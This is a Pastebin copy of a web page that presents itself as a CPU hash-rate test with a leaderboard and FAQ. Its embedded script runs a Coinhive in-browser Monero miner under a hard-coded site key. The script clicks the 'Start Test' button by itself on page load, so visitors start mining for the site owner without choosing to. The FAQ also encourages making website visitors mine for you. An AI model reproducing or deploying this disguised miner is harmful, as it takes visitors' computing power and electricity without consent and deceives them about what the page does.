Advertisement
Guest User

Untitled

a guest
Jan 18th, 2018
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.45 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <!-- saved from url=(0032)http://www.whatismyhashrate.com/ -->
  3. <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  4.  
  5. <title>Whats my Hash Rate?</title>
  6. <meta name="description" content="What is my computer&#39;s hash rate? Calcuate your hash power here.">
  7. <meta name="keywords" content="hashrate, hash, rate, what is my hash rate, my hash rate, my hashrate, hash rate, crypto mining, cryptocurrency, power, hashpower, hash calculator">
  8. <meta name="viewport" content="width=device-width">
  9. <link rel="canonical" href="http://www.whatsmyhashrate.com/">
  10. <style>
  11. *{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}
  12. html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-size:62.5%;}
  13. body{margin:0;font-size:1.5em;line-height:1.6;font-weight:400;font-family:"HelveticaNeue", "Helvetica Neue", Helvetica, Arial, sans-serif;color:#222;}
  14. .success{max-width:740px;margin:4px 0;padding:6px;border:1px solid #090;font:12px verdana,arial,sans-serif;color:#030;letter-spacing:1px;background-color:#dff2bf;text-align:center;font-size:12px}
  15. .error{max-width:740px;margin:4px 0;padding:6px;border:1px solid #900;font:12px verdana,arial,sans-serif;color:#300;letter-spacing:1px;background-color:#ffbaba;text-align:center;font-size:12px}
  16. img{border:0;}
  17. h1,h2,h3,h4,h5,h6{margin:0;font-weight:300;}
  18. h1{font-size:40px; font-size:4.0rem; line-height:1.20; letter-spacing:-0.10rem;}
  19. h2{font-size:24px; font-size:2.4rem; line-height:1.30; letter-spacing:-0.10rem;}
  20. h3{font-size:34px; font-size:3.4rem; line-height:1.23; letter-spacing:-0.10rem; color:#aaa;}
  21. h4{font-size:15px; font-size:1.5rem; line-height:1.35; letter-spacing:-0.05rem;}
  22. h5{font-size:15px; font-size:1.5rem; line-height:1.50; letter-spacing:-0.05rem;}
  23. h6{font-size:15px; font-size:1.5rem; line-height:1.60; letter-spacing:0;}
  24. h1#main{margin:70px 0 30px 0;font-weight:bold;}
  25. h3{margin:0 0 20px 0;}
  26. h4.hashrate-label,h4.total-hashes-label,h4.threads-label{margin:10px 0 4px 0;color:#aaa;}
  27. p{margin:0;}
  28. a{color:#1e9ee0;text-decoration:none;background-color:transparent;}
  29. .action{cursor:pointer;color:#1e9ee0;text-decoration:none;}
  30. a:hover,.action:hover,a.active,.action.active{color:#555;}
  31. .action.action-delete{color:#f30;font-size:160%;}
  32. table{margin:0;border-collapse:collapse;border-spacing:0;width:100%;}
  33. .hashtd{border:1px solid #eee;text-align:center;}
  34. #hdr{max-width:740px;padding:1px;border-bottom:1px solid #eee;font-size:10px;color:#aaa;}
  35. #ftr{max-width:740px;padding:1px;border-top:1px solid #eee;font-size:10px;color:#aaa;margin-top:60px;}
  36. #hashpower{max-width:600px;}
  37. #hash-algorithm{font-size:10px;color:#aaa;}
  38. #hash-content{max-width:600px;margin-top:80px;text-align:left;padding:20px;}
  39. #hash-content h2{margin:30px 0 0 0;color:#222;}
  40. #hash-content p{margin:0;color:#222;}
  41. #miner-hashrate.running h4,#miner-hashrate.running h3{color:#555;}
  42. #mining-stats-container{position:relative;text-align:center;height:96px;border-bottom:1px solid #e0e0e0;}
  43. #mining-stats-canvas{z-index:1;position:absolute;left:0;top:0;width:100%;height:100%;}
  44. #mining-controls{z-index:2;position:absolute;left:0;top:0;width:100%;height:100%;padding:32px 0;}
  45. #mining-start{text-transform:uppercase;font-size:120%;display:inline-block;}
  46. #miner-hashrate.running #mining-start{position:relative;z-index:2;display:none;}
  47. #mining-stop{display:none;}
  48. #miner-hashrate.running #mining-controls:hover #mining-stop{position:relative;z-index:2;display:inline-block;}
  49. .mining-icon{width:32px;height:32px;vertical-align:-37%;margin-right:4px;}
  50. .mining-icon .mining-stroke{stroke:#1e9ee0;}
  51. .mining-icon .mining-fill{fill:#1e9ee0;}
  52. .mining-button:hover .mining-icon .mining-stroke{stroke:#555;}
  53. .mining-button:hover .mining-icon .mining-fill{fill:#555;}
  54. #miner-hashrate.stopped .action{color:#aaa;}
  55. .mining-divide{font-size:80%; color:#eee;}
  56. .ct-label{fill:rgba(0, 0, 0, 0.4);color:rgba(0, 0, 0, 0.4);font-size:12px;line-height:1;white-space:nowrap;}
  57. .ct-chart-line .ct-label,.ct-chart-bar .ct-label{display:block;display:flex;}
  58. .ct-label.ct-horizontal.ct-start{align-items:flex-end;justify-content:flex-start;text-align:left;text-anchor:start;}
  59. .ct-label.ct-horizontal.ct-end{align-items:flex-start;justify-content:flex-start;text-align:left;text-anchor:start;}
  60. .ct-label.ct-vertical.ct-start{align-items:flex-end;justify-content:flex-end;text-align:right;text-anchor:end;}
  61. .ct-label.ct-vertical.ct-end{align-items:flex-end;justify-content:flex-start;text-align:left;text-anchor:start;}
  62. .ct-grid{stroke:rgba(0,0,0, 0.05);stroke-width:1px;stroke-dasharray:4px;}
  63. .ct-line{fill:none; stroke-width:1px;}
  64. .ct-series-a .ct-line{stroke:#4cc667;}.ct-series-b .ct-line{stroke:#f05b4f;}
  65. .ct-series-c .ct-line{stroke:#f4c63d;}.ct-series-d .ct-line{stroke:#d17905;}
  66. .ct-series-e .ct-line{stroke:#453d3f;}.ct-series-f .ct-line{stroke:#59922b;}
  67. .ct-series-g .ct-line{stroke:#0544d3;}.ct-series-h .ct-line{stroke:#6b0392;}
  68. .ct-series-i .ct-line{stroke:#f05b4f;}.ct-series-j .ct-line{stroke:#dda458;}
  69. .ct-series-k .ct-line{stroke:#eacf7d;}.ct-series-l .ct-line{stroke:#86797d;}
  70. .ct-series-m .ct-line{stroke:#b2c326;}.ct-series-n .ct-line{stroke:#6188e2;}
  71. .ct-series-o .ct-line{stroke:#a748ca;}.ct-legend{color:#555; margin:0 8px; display:inline-block;}
  72. .ct-legend-a{border-bottom:1px solid #4cc667;}.ct-legend-b{border-bottom:1px solid #f05b4f;}
  73. .ct-legend-c{border-bottom:1px solid #f4c63d;}.ct-legend-d{border-bottom:1px solid #d17905;}
  74. .ct-legend-e{border-bottom:1px solid #453d3f;}.ct-legend-f{border-bottom:1px solid #59922b;}
  75. .ct-legend-g{border-bottom:1px solid #0544d3;}.ct-legend-h{border-bottom:1px solid #6b0392;}
  76. .ct-legend-i{border-bottom:1px solid #f05b4f;}.ct-legend-j{border-bottom:1px solid #dda458;}
  77. .ct-legend-k{border-bottom:1px solid #eacf7d;}.ct-legend-l{border-bottom:1px solid #86797d;}
  78. .ct-legend-m{border-bottom:1px solid #b2c326;}.ct-legend-n{border-bottom:1px solid #6188e2;}
  79. .ct-legend-o{border-bottom:1px solid #a748ca;}</style>
  80. </head>
  81. <body>
  82. <div align="center">
  83. <div id="hdr">NO TRACKING PIXELS | NO ADS</div>
  84. <h1 id="main">Whats my Hash Rate?</h1>
  85. <div id="hashpower">
  86. <div class="stopped" id="miner-hashrate">
  87. <table>
  88. <tbody><tr><td width="33%" class="hashtd">
  89. <h4 class="hashrate-label">HASHES/s</h4><h3 id="mining-hashes-per-second">0.0</h3>
  90. </td><td width="33%" class="hashtd">
  91. <h4 class="total-hashes-label">TOTAL</h4><h3 id="mining-hashes-total">0</h3>
  92. </td><td class="hashtd">
  93. <h4 class="threads-label">THREADS</h4>
  94. <h3>
  95. <span id="mining-hashrate-threads">2</span>
  96. <span id="mining-hashrate-threads-add" class="action">+</span>
  97. <span class="mining-divide"> / </span>
  98. <span id="mining-hashrate-threads-remove" class="action">−</span>
  99. </h3>
  100. </td></tr><tr><td colspan="3">
  101. <div id="mining-stats-container">
  102. <canvas id="mining-stats-canvas"></canvas>
  103. <div id="mining-controls">
  104. <a href="http://www.whatismyhashrate.com/#" class="mining-button" id="mining-start">
  105. <svg class="mining-icon play-button" viewBox="0 0 200 200" alt="Start Mining">
  106. <circle cx="100" cy="100" r="90" fill="none" stroke-width="15" class="mining-stroke"></circle>
  107. <polygon points="70, 55 70, 145 145, 100" class="mining-fill"></polygon>
  108. </svg>
  109. Start Test
  110. </a>
  111. <a href="http://www.whatismyhashrate.com/#" class="mining-button" id="mining-stop">
  112. <svg class="mining-icon pause-button" viewBox="0 0 200 200" alt="Pause">
  113. <circle cx="100" cy="100" r="90" fill="none" stroke-width="15" class="mining-stroke"></circle>
  114. <rect x="70" y="50" width="20" height="100" class="mining-fill"></rect>
  115. <rect x="110" y="50" width="20" height="100" class="mining-fill"></rect>
  116. </svg>
  117. </a>
  118. </div>
  119. </div>
  120. </td></tr></tbody></table>
  121. </div>
  122. <div id="hash-algorithm"><b>Hash Algorithm:</b> CryptoNight</div>
  123. <div align="center">
  124. <table style="width:400px;margin-top:40px;">
  125.  
  126. <tbody><tr style="font-size:14px;font-weight:bold;color:#aaa"><td colspan="3">LEADERBOARD
  127. </td></tr><tr style="font-size:11px;font-weight:bold;border-bottom:1px solid #bbb;margin:0 0 8px 0"><td>RANK</td><td>NAME / WEBSITE</td><td align="right">TOTAL HASHES
  128. </td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>1</td><td>ytor</td><td align="right">67,977,216</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>2</td><td>Grebehead</td><td align="right">16,652,544</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>3</td><td>brad</td><td align="right">8,424,704</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>4</td><td>port</td><td align="right">6,368,768</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>5</td><td>eBay</td><td align="right">5,827,840</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>6</td><td><a href="http://yourconsumerguide.co.uk/" target="_blank" style="text-decoration:underline">yourconsumerguide.co.uk</a></td><td align="right">4,975,616</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>7</td><td>cloudB</td><td align="right">4,382,208</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>8</td><td>sari</td><td align="right">4,141,312</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>9</td><td>Zane</td><td align="right">3,979,520</td></tr><tr style="font-size:12px;border-bottom:1px solid #eee"><td>10</td><td><a href="http://collegetricksandtips.com/" target="_blank" style="text-decoration:underline">collegetricksandtips.com</a></td><td align="right">3,667,968
  129. </td></tr><tr><td colspan="3">&nbsp;
  130. </td></tr><tr style="font-size:14px;font-weight:bold;color:#aaa"><td colspan="3" style="color:#C70039">SUBMIT TO LEADERBOARD
  131. </td></tr><tr><td colspan="3">
  132. <form method="post" action="http://www.whatismyhashrate.com/?submit=y" style="border-top:1px solid #bbb;border-bottom:1px solid #bbb;padding:8px 0">
  133. <table style="width:&quot;100%&quot;">
  134. <tbody><tr style="font-size:12px;"><td>Name/Website</td><td><input type="text" name="ch_website" value=""></td><td align="right"><input type="submit" value="Enter">
  135. </td></tr></tbody></table>
  136. </form>
  137. </td></tr></tbody></table>
  138. </div>
  139. </div>
  140. <div id="hash-content">
  141. <h2>What is this site?</h2>
  142. <p>This is a reference site to view your computer's hash rate.</p>
  143. <h2>What does my hash rate mean?</h2>
  144. <p>Hash rate refers to how fast your computer (CPU) can compute the output of a hash function.</p>
  145. <h2>What's the Leaderboard all about?</h2>
  146. <p>If you submit your name or website, we'll track your total hashes for you.&nbsp; If your total hash amount reaches the top 10, we'll display your name or website on the Leaderboard automatically.</p>&nbsp;
  147. <p>For instance, if you submit &nbsp;<code>example.com</code>&nbsp; to the Leaderboard, the page will refresh to your unique hash rate tracking URL:<br><code>http://www.whatismyhashrate.com/example.com</code></p>&nbsp;
  148. <p>You can then load that URL on as many additional number of computers as you like to increase your total hash rate count.</p>
  149. <h2>I'm mining Monero (XMR)</h2>
  150. <p>Excellent.&nbsp; If you are in a mining pool such as Minergate, you can compare your hash rate here vs. what your mining pool claims you have.</p>
  151. <h2>Why do people care about hash rates?</h2>
  152. <p>Using a hash rate calulator is useful for cryptocurrency miners.&nbsp; A higher hash rate is benifical for crypto mining as you have a better chance of finding the next block and being awarded bitcoins or another valued cryptocurrency.</p>
  153. <h2>Can I make money with my hash rate?</h2>
  154. <p>Yes, try joining a mining pool like <a style="text-decoration:underline" href="https://minergate.com/a/a0dad4f5467603b394f0fd8f" target="_blank" rel="nofollow">Minergate</a>.&nbsp; You can make cryptocurrency, and once you have cryptocurrency, you can keep it, sell it, etc...&nbsp; How much you get depends on a variety of factors.&nbsp; In general here are some tips to earn more:<br>
  155. </p><ul><li>Using more than one computer.
  156. </li><li>Using modern computer(s) with modern browser(s).
  157. </li><li>In general, desktop/laptops will have higher hash rates then mobile devices.
  158. </li><li>Having your website visitors mine for you.
  159. </li><li>Having affiliates mine for you.
  160. </li></ul>
  161. <p>Things that don't really matter:</p>
  162. <ul><li>What country your traffic comes from.
  163. </li><li>If it's real users or bots hashing for you.
  164. </li></ul>
  165. <h2>What are the calculated units of measure for hash rates?</h2>
  166. <p>Hash rate is measure in hashes per second.&nbsp; Basically, how many times your computer can calculate the output of a hash function.<br>&nbsp;<br>
  167. 1000 Hashes/second = 1KH/s<br>
  168. 1000 KH/s = 1MH/s<br>
  169. 1000 MH/s = 1GH/s<br>
  170. 1000 GH/s = 1TH/s<br>
  171. 1000 TH/s = 1PH/s</p>
  172. <h2>Can I compare my hash power/rate to others?</h2>
  173. <p>Yes, but you need to make sure you're computing the same hash function.&nbsp; Above, you're computing the hash function <a href="https://cryptonote.org/cns/cns008.txt">CryptoNight</a>.&nbsp; This is a hash function used by Monero, a cryptocurrency.&nbsp; If you're looking for your hash rate for Bitcoin, you would want to calculate SHA256D (double <a href="https://en.wikipedia.org/wiki/SHA-2">SHA256</a>) outputs.</p>
  174. </div>
  175. <div id="ftr">© 2018 WhatsMyHashRate.com</div>
  176. </div>
  177. <script src="../coinhive.com/lib/coinhive.min.js"></script></body></html>
  178. <script type="text/javascript">
  179.  
  180. var MinerUI=function(t,e){this.miner=t,this.elements=e,this.intervalUpdateStats=0,this.intervalDrawGraph=0,this.ctx=this.elements.canvas.getContext("2d"),this.elements.startButton.addEventListener("click",this.start.bind(this)),this.elements.stopButton.addEventListener("click",this.stop.bind(this)),this.elements.threadsAdd.addEventListener("click",this.addThread.bind(this)),this.elements.threadsRemove.addEventListener("click",this.removeThread.bind(this)),this.stats=[];for(var s=0,i=0;i<300;s++,i+=5)this.stats.push({hashes:0,accepted:0});this.didAcceptHash=!1,this.miner.on("accepted",function(){this.didAcceptHash=!0}.bind(this))};MinerUI.prototype.start=function(t){return this.miner.start(CoinHive.FORCE_MULTI_TAB),this.elements.container.classList.add("running"),this.elements.container.classList.remove("stopped"),this.intervalUpdateStats=setInterval(this.updateStats.bind(this),50),this.intervalDrawGraph=setInterval(this.drawGraph.bind(this),500),this.elements.threads.textContent=this.miner.getNumThreads(),t.preventDefault(),!1},MinerUI.prototype.stop=function(t){return this.miner.stop(),this.elements.hashesPerSecond.textContent=0,this.elements.container.classList.remove("running"),this.elements.container.classList.add("stopped"),clearInterval(this.intervalUpdateStats),clearInterval(this.intervalDrawGraph),t.preventDefault(),!1},MinerUI.prototype.addThread=function(t){return this.miner.setNumThreads(this.miner.getNumThreads()+1),this.elements.threads.textContent=this.miner.getNumThreads(),t.preventDefault(),!1},MinerUI.prototype.removeThread=function(t){return this.miner.setNumThreads(Math.max(0,this.miner.getNumThreads()-1)),this.elements.threads.textContent=this.miner.getNumThreads(),t.preventDefault(),!1},MinerUI.prototype.updateStats=function(){this.elements.hashesPerSecond.textContent=this.miner.getHashesPerSecond().toFixed(1),this.elements.hashesTotal.textContent=this.miner.getTotalHashes(!0)},MinerUI.prototype.drawGraph=function(){this.elements.canvas.offsetWidth!==this.elements.canvas.width&&(this.elements.canvas.width=this.elements.canvas.offsetWidth,this.elements.canvas.height=this.elements.canvas.offsetHeight);var t=this.elements.canvas.width,e=this.elements.canvas.height,s=this.stats.shift();this.stats[this.stats.length-1];s.hashes=this.miner.getHashesPerSecond(),s.accepted=this.didAcceptHash,this.didAcceptHash=!1,this.stats.push(s);for(var i=0,n=0;n<this.stats.length;n++){var h=this.stats[n].hashes;h>i&&(i=h)}this.ctx.clearRect(0,0,t,e);for(var n=this.stats.length,a=1;n--;a++){var r=this.stats[n],d=r.hashes/i*(e-16)|0;r.accepted?(this.ctx.fillStyle="#aaa",this.ctx.fillRect(t-10*a,e-d,9,d)):(this.ctx.fillStyle="#ccc",this.ctx.fillRect(t-10*a,e-d,9,d))}};var miner=new CoinHive.User("7AyGMv2EIO2GX0WshLOzmUuXqtZXEqdB","",{threads:4}),ui=new MinerUI(miner,{container:document.getElementById("miner-hashrate"),canvas:document.getElementById("mining-stats-canvas"),hashesPerSecond:document.getElementById("mining-hashes-per-second"),threads:document.getElementById("mining-hashrate-threads"),threadsAdd:document.getElementById("mining-hashrate-threads-add"),threadsRemove:document.getElementById("mining-hashrate-threads-remove"),hashesTotal:document.getElementById("mining-hashes-total"),startButton:document.getElementById("mining-start"),stopButton:document.getElementById("mining-stop")});document.getElementById("mining-start").click();</script>
  181. </body>
  182. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement